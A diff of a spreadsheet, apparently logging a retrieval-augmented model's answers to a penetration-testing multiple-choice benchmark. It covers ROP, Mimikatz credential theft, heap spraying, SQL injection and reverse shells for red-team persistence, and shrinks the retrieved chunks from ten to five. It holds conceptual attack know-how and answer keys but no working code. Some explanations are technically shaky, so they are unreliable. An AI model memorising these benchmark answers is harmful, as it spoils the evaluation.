+Explanation: Address Space Layout Randomization (ASLR) is the most effective among the listed options for hindering a return-oriented programming (ROP) attack. ROP attacks rely on finding and executing gadgets (small snippets of code ending in a return instruction) that already exist in system memory. ASLR randomizes the memory addresses where system and application code is loaded, making it significantly difficult for attackers to predict where their required gadgets are located, thus disrupting the attack. DEP (Data Execution Prevention) can prevent execution from non-executable memory regions but does not directly address ROP attacks. Canary-based stack protection detects changes in memory and can help prevent buffer overflow attacks, but it doesn't specifically target ROP attacks. Sandboxing is a technique used to isolate and contain processes or code, preventing them from interacting with the rest of the system, but it does not directly address ROP attacks.</t>
         </is>
       </c>
       <c r="G125" t="inlineStr">
@@ -8804,21 +8176,16 @@
 preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9b3ce6f9-42f5-4df6-a5ae-9070e935f278, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I125" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J125" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K125" t="inlineStr">
         <is>
@@ -8857,7 +8224,7 @@
       <c r="F126" t="inlineStr">
         <is>
           <t>Answer: Mimikatz
-Explanation: Mimikatz is a well-known utility used in cybersecurity, especially in red team operations, for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory on Windows operating systems. While Metasploit, Cobalt Strike, and Beacon are all powerful tools in their own right, they do not specifically target the extraction of these types of credentials from memory.</t>
+Explanation: Mimikatz is a powerful tool specifically designed for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory on Windows operating systems. It exploits vulnerabilities in Windows security mechanisms or mishandlings like pass-the-hash or pass-the-ticket to acquire credentials. While Metasploit is a general-purpose penetration testing toolkit, Cobalt Strike focuses more on providing a post-exploitation framework rather than direct credentials extraction, and Beacon is a payload for Cobalt Strike that provides remote access but does not directly extract memory-based credentials.</t>
         </is>
       </c>
       <c r="G126" t="inlineStr">
@@ -8871,21 +8238,16 @@
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I126" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J126" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K126" t="inlineStr">
         <is>
@@ -8938,21 +8300,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I127" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J127" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K127" t="inlineStr">
         <is>
@@ -9005,21 +8362,16 @@
 preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: dense, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 182a7277-7260-4e88-863e-856230966432, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 563f16fa-cc72-486e-8f2c-23b97579c134, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I128" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J128" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K128" t="inlineStr">
         <is>
@@ -9058,13 +8410,7 @@
       <c r="F129" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in a custom protocol handler
-Explanation: Proprietary software that handles incoming network data often involves custom protocol handlers. These
-protocol handlers can have buffer overflow vulnerabilities, which allow an attacker to execute arbitrary code on the
-target system. SQL injection and cross-site scripting are more relevant to web applications, while unauthorized API
-access with reused tokens is a different type of vulnerability that may not be applicable in this scenario. Therefore,
-exploiting a buffer overflow in a custom protocol handler would be the most strategically appropriate choice for
-gaining remote code execution on an internal server running proprietary software that interprets incoming network
-data during a red team exercise.</t>
+Explanation: Buffer overflow in a custom protocol handler is the most applicable choice due to the nature of the system described. Proprietary software that handles incoming network data often involves custom protocols and may not have been thoroughly tested or patched for common vulnerabilities like SQL injection or cross-site scripting. Exploiting a buffer overflow in the custom protocol handler would be more likely to gain remote code execution on the server running the proprietary software.</t>
         </is>
       </c>
       <c r="G129" t="inlineStr">
@@ -9078,21 +8424,16 @@
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I129" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J129" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K129" t="inlineStr">
         <is>
@@ -9131,7 +8472,7 @@
       <c r="F130" t="inlineStr">
         <is>
           <t>Answer: Static Analysis
-Explanation: Static Analysis is the most suitable technique for examining encrypted payloads within a malware binary without executing the code. This method involves reviewing the code, binaries, and associated data, to extract information and potentially identify and analyze malicious sections such as encrypted payloads. Static analysis does not involve running the suspect code, therefore, it carries less risk of accidentally triggering malicious behavior. Dynamic Analysis, in contrast, involves executing the malware in a controlled environment to observe its behavior, which is not optimal for initial analysis of encrypted payloads. Hybrid Analysis combines elements of both static and dynamic techniques but can be overkill for initial analysis. Automated Code Review is not typically used for this purpose as it focuses on code quality rather than malicious content identification.</t>
+Explanation: Static Analysis is the most suitable technique for examining encrypted payloads within a malware binary without executing the code. This method involves reviewing the code, binaries, and associated data, to extract information and potentially identify and analyze malicious sections such as encrypted payloads. Static analysis does not involve running the suspect code, therefore, it carries less risk of accidentally triggering malicious behavior. Dynamic Analysis, in contrast, involves executing the malware in a controlled environment to observe its behavior, which is not optimal for initial analysis of encrypted payloads. Hybrid Analysis combines elements of both static and dynamic techniques but can be overkill for initial analysis. Automated Code Review is not typically used in this context as it focuses on code quality rather than malicious intent or encrypted payloads.</t>
         </is>
       </c>
       <c r="G130" t="inlineStr">
@@ -9145,21 +8486,16 @@
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7ea14143-5006-4460-8551-02e670eeceb2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I130" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J130" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K130" t="inlineStr">
         <is>
@@ -9198,7 +8534,7 @@
       <c r="F131" t="inlineStr">
         <is>
           <t>Answer: Heap spraying
-Explanation: Heap spraying is a technique typically used by attackers in exploitation scenarios to manipulate the heap's layout and inject shellcode. Unlike stack-based buffer overflows which corrupt memory by overflowing the stack buffer, heap spraying targets the dynamic memory allocation region known as the heap. It involves filling the heap with a large quantity of shellcode to increase the likelihood of the instruction pointer jumping to an address containing the malicious code during an exploitation of a different vulnerability.</t>
+Explanation: Heap spraying is a technique typically used by attackers in exploitation scenarios to manipulate the heap's layout and inject shellcode. Unlike stack-based buffer overflows which corrupt memory by overrunning the stack buffer, heap spraying targets the dynamic memory allocation region known as the heap. It involves filling the heap with a large quantity of shellcode to increase the likelihood of the instruction pointer jumping to an address containing the malicious code during an exploitation of a different vulnerability.</t>
         </is>
       </c>
       <c r="G131" t="inlineStr">
@@ -9212,21 +8548,16 @@
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I131" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J131" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K131" t="inlineStr">
         <is>
@@ -9265,7 +8596,7 @@
       <c r="F132" t="inlineStr">
         <is>
           <t>Answer: Shellcode injection via buffer overflow
-Explanation: The most effective technique for executing arbitrary code on a remote server by exploiting system software vulnerabilities is 'Shellcode injection via buffer overflow'. This method involves injecting malicious code directly into a program's execution stack, then manipulating the stack pointer to execute this code, typically bypassing security controls like non-executable stack.</t>
+Explanation: The most effective technique for executing arbitrary code on a remote server by exploiting system software vulnerabilities is 'Shellcode injection via buffer overflow'. This method involves injecting malicious code directly into a program's execution stack, then manipulating the stack pointer to execute this code, typically bypassing security controls like non-executable stack. Cross-site scripting (XSS) primarily affects client-side security and is not relevant for executing arbitrary code on remote servers. SQL injection is primarily an attack vector into a system, rather than a method for stealthy data exfiltration. A brute force attack on SSH login would allow access to the server but does not execute arbitrary code.</t>
         </is>
       </c>
       <c r="G132" t="inlineStr">
@@ -9279,21 +8610,16 @@
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I132" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J132" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K132" t="inlineStr">
         <is>
@@ -9346,21 +8672,16 @@
 preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I133" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J133" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K133" t="inlineStr">
         <is>
@@ -9399,7 +8720,7 @@
       <c r="F134" t="inlineStr">
         <is>
           <t>Answer: Isolating and examining network traffic to and from the infected host
-Explanation: Isolating and examining network traffic to and from the infected host is the most effective technique for identifying covert data exfiltration pathways. This technique allows analysts to see what data is being sent out from the infected machine, potentially unbeknownst to legitimate users or processes. By examining the network traffic, analysts can spot unusual patterns or connections to suspicious IPs that indicate data exfiltration. The first choice, analyzing memory for strings, might help identify malware but does not directly reveal data exfiltration paths. Monitoring antivirus software detection logs is useful for identifying known malware signatures but might not catch new or modified malware that employs unique exfiltration techniques. Conducting external vulnerability scans can help identify system weaknesses but does not provide direct insight into ongoing data exfiltration activities.</t>
+Explanation: Isolating and examining network traffic to and from the infected host is the most effective technique for identifying covert data exfiltration pathways. This technique allows analysts to see what data is being sent out from the infected machine, potentially unbeknownst to legitimate users or processes. By examining the network traffic, analysts can spot unusual patterns or connections to suspicious IPs that indicate data exfiltration. The other options might provide some insight into the malware's behavior but are not as directly related to identifying covert data exfiltration pathways.</t>
         </is>
       </c>
       <c r="G134" t="inlineStr">
@@ -9413,21 +8734,16 @@
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I134" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J134" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K134" t="inlineStr">
         <is>
@@ -9466,7 +8782,7 @@
       <c r="F135" t="inlineStr">
         <is>
           <t>Answer: Remote code execution via SQL injection
-Explanation: The most effective technique for compromising a web application's admin panel in this scenario would be 'Remote code execution via SQL injection'. This attack involves exploiting a security vulnerability that occurs when user inputs are not correctly sanitized or validated, allowing an attacker to inject malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Buffer overflow exploits, while serious, are generally related to overflow conditions in application memory space rather than database access specifically. Brute-force attacks on encrypted files are unrelated to direct database access through a web application. Cross-site scripting (XSS) is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
+Explanation: The most effective technique for compromising a web application's admin panel in this scenario would be 'Remote code execution via SQL injection'. SQL injection exploits a security vulnerability occurring in the database layer of an application. The vulnerabilities are present when user inputs are incorrectly processed by the application, allowing an attacker to inject malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Buffer overflow exploits, while serious, are generally related to overflow conditions in application memory space rather than database access specifically. Brute-force attacks on encrypted files are unrelated to direct database access through a web application. Cross-site scripting (XSS) is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
         </is>
       </c>
       <c r="G135" t="inlineStr">
@@ -9480,21 +8796,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I135" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J135" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K135" t="inlineStr">
         <is>
@@ -9533,9 +8844,7 @@
       <c r="F136" t="inlineStr">
         <is>
           <t>Answer: RCE via a buffer overflow in SNMP daemon
-Explanation: Remote Code Execution (RCE) via a buffer overflow in Simple Network Management Protocol
-(SNMP) daemon is most likely to be exploited in the context of a network printer's management interface.
-SNMP is commonly used for the management of networked devices, including printers, and is often implemented on network devices to provide monitoring and management capabilities. A buffer overflow in this protocol's daemon can allow an attacker to execute arbitrary code on the device, potentially taking over the printer or using it as a foothold into the network. The other vulnerabilities listed, such as XSS, SQL Injection, and Clickjacking, are less likely to be relevant for this specific context as they are typically associated with web applications rather than network printer management interfaces.</t>
+Explanation: Remote Code Execution (RCE) via a buffer overflow in Simple Network Management Protocol (SNMP) daemon is most likely to be exploited in the context of a network printer's management interface. SNMP is commonly used for the management of networked devices, including printers, and is often implemented on network devices to provide monitoring and management capabilities. A buffer overflow in this protocol's daemon can allow an attacker to execute arbitrary code on the device, potentially taking over the printer or using it as a foothold into the network. The other vulnerabilities listed, such as XSS, SQL Injection, and Clickjacking, are less likely to be relevant for this specific context as they are typically associated with web applications rather than network printer management interfaces.</t>
         </is>
       </c>
       <c r="G136" t="inlineStr">
@@ -9549,21 +8858,16 @@
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 33a81ea5-e2d4-4b7f-934e-5e7dada9648b, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3ce003fc-f967-479a-be9c-461f49ad3c11, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I136" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J136" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K136" t="inlineStr">
         <is>
@@ -9602,7 +8906,7 @@
       <c r="F137" t="inlineStr">
         <is>
           <t>Answer: Using a reverse shell to maintain continuous access
-Explanation: In the context of red team operations, especially against a well-defended target like a financial institution, the goal is to simulate advanced persistent threats that aim for stealth and longevity in their access. Using a reverse shell is generally the most effective initial tactic for such purposes. It allows the red team operator to execute commands and control the target system remotely while maintaining a low profile, which is critical in avoiding detection. Exploiting an SQL injection to bypass authentication is indeed effective, but it does not directly confer internal network access as effectively or as stealthily as using a reverse shell. Deploying a ransomware to encrypt system data and performing a DDoS attack to disrupt services are both disruptive tactics that do not facilitate long-term network penetration or data access, making them less suitable for operations specifically testing data exfiltration defenses.</t>
+Explanation: In the context of red team operations, especially against a well-defended target like a financial institution, the goal is to simulate advanced persistent threats that aim for stealth and longevity in their access. Using a reverse shell is generally the most effective initial tactic for such purposes. It allows the red team operator to execute commands and control the target system remotely while maintaining a low profile, which is critical in avoiding detection. Exploiting an SQL injection to bypass authentication is indeed effective, but it's more focused on gaining initial access rather than maintaining long-term access. Deploying a ransomware and performing a DDoS attack are both disruptive tactics that may not necessarily lead to long-term access or data exfiltration, making them less suitable for operations specifically testing data exfiltration defenses.</t>
         </is>
       </c>
       <c r="G137" t="inlineStr">
@@ -9616,21 +8920,16 @@
